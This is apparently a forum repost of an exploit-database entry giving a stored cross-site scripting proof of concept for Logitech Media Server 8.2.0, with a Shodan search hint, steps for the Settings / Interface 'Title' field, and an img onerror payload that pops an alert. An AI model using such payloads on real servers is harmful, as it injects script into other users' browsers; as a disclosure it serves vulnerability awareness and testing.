This CHT Posted November 4, 2022 Group: The leader of the Content Count: 4,798 Achievement Points: 31,700 With Us For: 233 Days Status: Offline Last Seen: May 19 Device: Windows Share Posted November 4, 2022 # Exploit Title: Logitech Media Server 8.2.0 - 'Title' Cross-Site Scripting (XSS) # Shodan Dork: Search Logitech Media Server # Date: 12.10.2021 # Exploit Author: Mert Das # Vendor Homepage: www.logitech.com # Version: 8.2.0 # Tested on: Windows 10, Linux POC: 1. Go to Settings / Interface tab 2. Add payload to Title section 3. Payload : "><img src=1 onerror=alert(1)> 4. Alert will popup Link to comment Share on other sites More sharing options...
Recommended Posts